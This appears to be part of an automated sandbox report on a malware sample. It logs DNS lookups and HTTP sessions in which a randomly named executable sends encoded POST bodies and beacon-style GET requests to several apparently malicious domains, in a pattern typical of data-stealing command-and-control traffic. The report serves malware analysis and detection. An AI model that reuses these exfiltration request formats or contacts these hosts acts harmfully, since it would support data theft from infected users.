                                              Jul 26, 2024 13:57:34.295300961 CEST5278453192.168.2.41.1.1.1
                                              Jul 26, 2024 13:57:34.354926109 CEST53527841.1.1.1192.168.2.4
                                              Jul 26, 2024 13:57:47.819061041 CEST5312453192.168.2.41.1.1.1
                                              Jul 26, 2024 13:57:47.926206112 CEST53531241.1.1.1192.168.2.4
                                              Jul 26, 2024 13:58:01.318789005 CEST5075153192.168.2.41.1.1.1
                                              Jul 26, 2024 13:58:01.487025023 CEST53507511.1.1.1192.168.2.4
                                              Jul 26, 2024 13:58:14.742822886 CEST6541653192.168.2.41.1.1.1
                                              Jul 26, 2024 13:58:15.109767914 CEST53654161.1.1.1192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jul 26, 2024 13:56:45.988498926 CEST192.168.2.41.1.1.10x626bStandard query (0)www.accelbusiness.netA (IP address)IN (0x0001)false
                                              Jul 26, 2024 13:57:06.614130020 CEST192.168.2.41.1.1.10xa776Standard query (0)www.bosonserver.netA (IP address)IN (0x0001)false
                                              Jul 26, 2024 13:57:20.427733898 CEST192.168.2.41.1.1.10x2f65Standard query (0)www.hourglasspoise.netA (IP address)IN (0x0001)false
                                              Jul 26, 2024 13:57:34.295300961 CEST192.168.2.41.1.1.10xfb5dStandard query (0)www.asymtos.techA (IP address)IN (0x0001)false
                                              Jul 26, 2024 13:57:47.819061041 CEST192.168.2.41.1.1.10x6ceStandard query (0)www.lontos.topA (IP address)IN (0x0001)false
                                              Jul 26, 2024 13:58:01.318789005 CEST192.168.2.41.1.1.10x2065Standard query (0)www.theiconsummit.lifeA (IP address)IN (0x0001)false
                                              Jul 26, 2024 13:58:14.742822886 CEST192.168.2.41.1.1.10x406Standard query (0)www.accessoriestechbd.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jul 26, 2024 13:56:46.002851009 CEST1.1.1.1192.168.2.40x626bNo error (0)www.accelbusiness.netaccelbusiness.netCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 13:56:46.002851009 CEST1.1.1.1192.168.2.40x626bNo error (0)accelbusiness.net3.33.130.190A (IP address)IN (0x0001)false
                                              Jul 26, 2024 13:56:46.002851009 CEST1.1.1.1192.168.2.40x626bNo error (0)accelbusiness.net15.197.148.33A (IP address)IN (0x0001)false
                                              Jul 26, 2024 13:57:06.673705101 CEST1.1.1.1192.168.2.40xa776No error (0)www.bosonserver.netbosonserver.netCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 13:57:06.673705101 CEST1.1.1.1192.168.2.40xa776No error (0)bosonserver.net195.200.3.58A (IP address)IN (0x0001)false
                                              Jul 26, 2024 13:57:21.011578083 CEST1.1.1.1192.168.2.40x2f65No error (0)www.hourglasspoise.nethourglasspoise.netCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 13:57:21.011578083 CEST1.1.1.1192.168.2.40x2f65No error (0)hourglasspoise.net3.33.130.190A (IP address)IN (0x0001)false
                                              Jul 26, 2024 13:57:21.011578083 CEST1.1.1.1192.168.2.40x2f65No error (0)hourglasspoise.net15.197.148.33A (IP address)IN (0x0001)false
                                              Jul 26, 2024 13:57:34.354926109 CEST1.1.1.1192.168.2.40xfb5dNo error (0)www.asymtos.techasymtos.techCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 13:57:34.354926109 CEST1.1.1.1192.168.2.40xfb5dNo error (0)asymtos.tech217.160.164.240A (IP address)IN (0x0001)false
                                              Jul 26, 2024 13:57:47.926206112 CEST1.1.1.1192.168.2.40x6ceNo error (0)www.lontos.top203.161.42.162A (IP address)IN (0x0001)false
                                              Jul 26, 2024 13:58:01.487025023 CEST1.1.1.1192.168.2.40x2065No error (0)www.theiconsummit.lifetheiconsummit.lifeCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 13:58:01.487025023 CEST1.1.1.1192.168.2.40x2065No error (0)theiconsummit.life3.33.130.190A (IP address)IN (0x0001)false
                                              Jul 26, 2024 13:58:01.487025023 CEST1.1.1.1192.168.2.40x2065No error (0)theiconsummit.life15.197.148.33A (IP address)IN (0x0001)false
                                              Jul 26, 2024 13:58:15.109767914 CEST1.1.1.1192.168.2.40x406No error (0)www.accessoriestechbd.comaccessoriestechbd.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 13:58:15.109767914 CEST1.1.1.1192.168.2.40x406No error (0)accessoriestechbd.com103.29.180.74A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • www.accelbusiness.net
                                              • www.bosonserver.net
                                              • www.hourglasspoise.net
                                              • www.asymtos.tech
                                              • www.lontos.top
                                              • www.theiconsummit.life
                                              • www.accessoriestechbd.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.4497433.33.130.190805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:56:46.052898884 CEST434OUTGET /sg0d/?r4HtI=inDHeTS0D6JHi&bPD=ZFII8SVAvGzgMmVXT4ZY+5svGFARRAPMY6hEAWMgzd/rbIPLPNZ+nr66isGJwkaWRyig0DUujo2cMsRd49nDMp6VdguE/ogC4VFXU40D/gpWgkUbHmnCm4E= HTTP/1.1
                                              Host: www.accelbusiness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Jul 26, 2024 13:56:46.525693893 CEST399INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Fri, 26 Jul 2024 11:56:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 259
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 72 34 48 74 49 3d 69 6e 44 48 65 54 53 30 44 36 4a 48 69 26 62 50 44 3d 5a 46 49 49 38 53 56 41 76 47 7a 67 4d 6d 56 58 54 34 5a 59 2b 35 73 76 47 46 41 52 52 41 50 4d 59 36 68 45 41 57 4d 67 7a 64 2f 72 62 49 50 4c 50 4e 5a 2b 6e 72 36 36 69 73 47 4a 77 6b 61 57 52 79 69 67 30 44 55 75 6a 6f 32 63 4d 73 52 64 34 39 6e 44 4d 70 36 56 64 67 75 45 2f 6f 67 43 34 56 46 58 55 34 30 44 2f 67 70 57 67 6b 55 62 48 6d 6e 43 6d 34 45 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?r4HtI=inDHeTS0D6JHi&bPD=ZFII8SVAvGzgMmVXT4ZY+5svGFARRAPMY6hEAWMgzd/rbIPLPNZ+nr66isGJwkaWRyig0DUujo2cMsRd49nDMp6VdguE/ogC4VFXU40D/gpWgkUbHmnCm4E="}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449744195.200.3.58805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:57:06.716505051 CEST694OUTPOST /x10g/ HTTP/1.1
                                              Host: www.bosonserver.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.bosonserver.net
                                              Referer: http://www.bosonserver.net/x10g/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Raw: 62 50 44 3d 4e 76 67 4a 61 2b 53 75 63 52 4c 45 4f 48 41 4e 5a 70 66 54 30 73 34 54 52 37 72 6e 30 53 6f 54 66 4a 68 2f 6e 44 76 34 77 34 52 71 52 70 54 35 49 47 4b 56 64 68 2f 65 56 39 70 58 4a 4b 69 4e 34 69 4d 6b 58 42 38 6e 70 31 69 4c 4a 76 4f 6d 32 32 31 6d 30 74 54 72 50 38 63 79 34 5a 67 4c 41 33 2b 75 65 4f 31 44 59 39 52 4b 61 59 59 49 56 63 4f 69 44 58 6f 74 75 55 65 65 63 33 7a 30 71 41 70 30 76 6e 58 4c 79 59 67 51 32 36 41 36 31 31 66 4f 76 6e 51 30 47 37 65 37 49 48 51 46 65 5a 47 2f 79 47 75 49 48 45 46 59 32 74 64 4a 2b 66 66 78 73 56 54 38 69 4b 2f 42 55 31 73 73 30 67 3d 3d
                                              Data Ascii: bPD=NvgJa+SucRLEOHANZpfT0s4TR7rn0SoTfJh/nDv4w4RqRpT5IGKVdh/eV9pXJKiN4iMkXB8np1iLJvOm221m0tTrP8cy4ZgLA3+ueO1DY9RKaYYIVcOiDXotuUeec3z0qAp0vnXLyYgQ26A611fOvnQ0G7e7IHQFeZG/yGuIHEFY2tdJ+ffxsVT8iK/BU1ss0g==
                                              Jul 26, 2024 13:57:07.403541088 CEST1068INHTTP/1.1 301 Moved Permanently
                                              Connection: close
                                              content-type: text/html
                                              content-length: 795
                                              date: Fri, 26 Jul 2024 11:57:07 GMT
                                              server: LiteSpeed
                                              location: https://www.bosonserver.net/x10g/
                                              platform: hostinger
                                              content-security-policy: upgrade-insecure-requests
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449745195.200.3.58805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:57:09.309747934 CEST714OUTPOST /x10g/ HTTP/1.1
                                              Host: www.bosonserver.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.bosonserver.net
                                              Referer: http://www.bosonserver.net/x10g/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Raw: 62 50 44 3d 4e 76 67 4a 61 2b 53 75 63 52 4c 45 50 6e 63 4e 57 71 33 54 67 38 34 51 65 62 72 6e 69 69 70 59 66 4a 74 2f 6e 42 44 57 77 4b 31 71 52 4a 6a 35 4a 46 53 56 61 68 2f 65 53 4e 6f 64 52 71 6a 50 34 69 42 52 58 41 51 6e 70 30 47 4c 4a 74 57 6d 78 41 39 68 32 39 54 70 4a 38 63 77 6d 70 67 4c 41 33 2b 75 65 4f 68 74 59 39 4a 4b 47 37 51 49 48 39 4f 68 64 6e 6f 79 6d 30 65 65 57 6e 7a 77 71 41 70 47 76 6d 4c 68 79 61 59 51 32 37 77 36 30 68 4c 42 32 58 51 79 4d 62 66 4d 4a 58 74 6f 65 72 33 45 37 67 6d 33 47 56 46 42 33 72 4d 54 76 75 2b 6d 2b 56 33 50 2f 4e 32 31 5a 32 52 6c 76 6c 50 71 38 36 6e 6c 64 4d 6c 62 77 48 79 6b 56 41 56 5a 53 54 45 3d
                                              Data Ascii: bPD=NvgJa+SucRLEPncNWq3Tg84QebrniipYfJt/nBDWwK1qRJj5JFSVah/eSNodRqjP4iBRXAQnp0GLJtWmxA9h29TpJ8cwmpgLA3+ueOhtY9JKG7QIH9Ohdnoym0eeWnzwqApGvmLhyaYQ27w60hLB2XQyMbfMJXtoer3E7gm3GVFB3rMTvu+m+V3P/N21Z2RlvlPq86nldMlbwHykVAVZSTE=
                                              Jul 26, 2024 13:57:10.034441948 CEST1068INHTTP/1.1 301 Moved Permanently
                                              Connection: close
                                              content-type: text/html
                                              content-length: 795
                                              date: Fri, 26 Jul 2024 11:57:09 GMT
                                              server: LiteSpeed
                                              location: https://www.bosonserver.net/x10g/
                                              platform: hostinger
                                              content-security-policy: upgrade-insecure-requests
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.449746195.200.3.58805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:57:11.917023897 CEST10796OUTPOST /x10g/ HTTP/1.1
                                              Host: www.bosonserver.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.bosonserver.net
                                              Referer: http://www.bosonserver.net/x10g/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Raw: 62 50 44 3d 4e 76 67 4a 61 2b 53 75 63 52 4c 45 50 6e 63 4e 57 71 33 54 67 38 34 51 65 62 72 6e 69 69 70 59 66 4a 74 2f 6e 42 44 57 77 4b 39 71 52 36 72 35 47 46 75 56 62 68 2f 65 64 64 6f 65 52 71 6a 4f 34 68 78 56 58 41 4d 52 70 33 75 4c 4c 4f 65 6d 77 79 56 68 2f 39 54 70 4c 38 63 78 34 5a 68 66 41 33 4f 69 65 4f 78 74 59 39 4a 4b 47 38 67 49 52 63 4f 68 66 6e 6f 74 75 55 65 53 63 33 7a 49 71 44 59 78 76 6c 6e 62 79 70 51 51 32 62 67 36 35 79 7a 42 70 6e 51 77 50 62 66 55 4a 58 68 72 65 72 36 2f 37 67 36 64 47 56 78 42 33 76 39 36 72 36 75 4a 76 48 54 31 68 75 75 4f 56 32 39 6a 6e 58 4c 58 37 71 43 36 44 75 34 33 34 48 4f 75 4a 51 68 56 48 31 36 38 6c 71 5a 66 4e 73 51 77 41 46 54 64 47 76 38 38 38 75 42 49 77 73 31 56 37 4b 69 37 2b 44 51 78 79 31 6e 39 32 6d 58 78 39 44 2f 67 33 55 6c 67 74 65 4e 51 47 36 4a 2f 6b 36 4a 54 76 33 6c 33 57 4d 77 48 4e 44 39 58 6b 62 51 5a 43 38 4b 43 76 43 34 70 39 46 32 6d 74 61 44 65 6b 57 57 36 65 4d 5a 78 30 6c 4a 78 35 75 46 76 2b 66 78 68 74 32 31 31 6a 39 [TRUNCATED]
                                              Data Ascii: bPD=NvgJa+SucRLEPncNWq3Tg84QebrniipYfJt/nBDWwK9qR6r5GFuVbh/eddoeRqjO4hxVXAMRp3uLLOemwyVh/9TpL8cx4ZhfA3OieOxtY9JKG8gIRcOhfnotuUeSc3zIqDYxvlnbypQQ2bg65yzBpnQwPbfUJXhrer6/7g6dGVxB3v96r6uJvHT1huuOV29jnXLX7qC6Du434HOuJQhVH168lqZfNsQwAFTdGv888uBIws1V7Ki7+DQxy1n92mXx9D/g3UlgteNQG6J/k6JTv3l3WMwHND9XkbQZC8KCvC4p9F2mtaDekWW6eMZx0lJx5uFv+fxht211j9D9AFu+wZWoe5o7Gn4GtOIpkHrUBiA5+U4/OpnY+H6XS0twM3jOdmeQpr04CEP+t0tMXKiLSe89ImC4j6IlBJ6q12lVFmPeIXyq0ybkdi9idAIR45/APRWwhfMZ8pigBugUVNJXp+FE19tJiuDXmpA8q9pKYGEjdo689cAsFFublK+YJIRYy0YP2Z6XXFeTULTXPbwomLDCMtaj6eiEkD4R7vqix3q5XRTHNa4EyohJQIbpZn8rKK4Q2MkvkSwc17kFtHx0Kj2vCaxGBplGVNwmSYacwduNGylNnzVpa0WEVelF5cQJJkXaJfdcor2IMGcgo8Xi15Gd0CBpHKWEFXQrygYSsruEjGd1RFdI+/GQ+fL33Jhtgk0Aec6O6X/pilM6fMyEuswafRFyAs8iQWZsurZRfodJOWXH2ZZehcGwagc8ahC1ctXKh6L+Ck3XTkSXGTT35RQhDOiOrV141wQWNfQmmcuXlwLkBfV3xiqaZR0eP1/tWqVC2npRoZXv3ITRLUxdgIOE6R6kwuHEITfKZSk5JIO0PV2RB9onIQlxzp/NbC/pneBz7GwzetbBV/WXXz/4wwrrTLeIYm436I/zrUgFFDrwLY3IlfIUcZjM7UUOS1FpyugZ1C/toNhrjLweQ8BYkCjc9s2v5bxQ+Af4wy3Vq+vyWsym [TRUNCATED]
                                              Jul 26, 2024 13:57:12.627418041 CEST1068INHTTP/1.1 301 Moved Permanently
                                              Connection: close
                                              content-type: text/html
                                              content-length: 795
                                              date: Fri, 26 Jul 2024 11:57:12 GMT
                                              server: LiteSpeed
                                              location: https://www.bosonserver.net/x10g/
                                              platform: hostinger
                                              content-security-policy: upgrade-insecure-requests
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.449747195.200.3.58805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:57:14.568001986 CEST432OUTGET /x10g/?bPD=AtIpZIbrclbIO3wVVorP/+4YW7XwgThFYZcx/yn27KMXet/sCHbTQiCzWIx6Kv/NnE9nJScnuF31JPyJpxVQ15qsd8YhwJ4GP0n6fMl4YdtRcYZTZezTcHY=&r4HtI=inDHeTS0D6JHi HTTP/1.1
                                              Host: www.bosonserver.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Jul 26, 2024 13:57:15.382633924 CEST1213INHTTP/1.1 301 Moved Permanently
                                              Connection: close
                                              content-type: text/html
                                              content-length: 795
                                              date: Fri, 26 Jul 2024 11:57:15 GMT
                                              server: LiteSpeed
                                              location: https://www.bosonserver.net/x10g/?bPD=AtIpZIbrclbIO3wVVorP/+4YW7XwgThFYZcx/yn27KMXet/sCHbTQiCzWIx6Kv/NnE9nJScnuF31JPyJpxVQ15qsd8YhwJ4GP0n6fMl4YdtRcYZTZezTcHY=&r4HtI=inDHeTS0D6JHi
                                              platform: hostinger
                                              content-security-policy: upgrade-insecure-requests
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.4497483.33.130.190805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:57:21.050584078 CEST703OUTPOST /5gvb/ HTTP/1.1
                                              Host: www.hourglasspoise.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.hourglasspoise.net
                                              Referer: http://www.hourglasspoise.net/5gvb/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
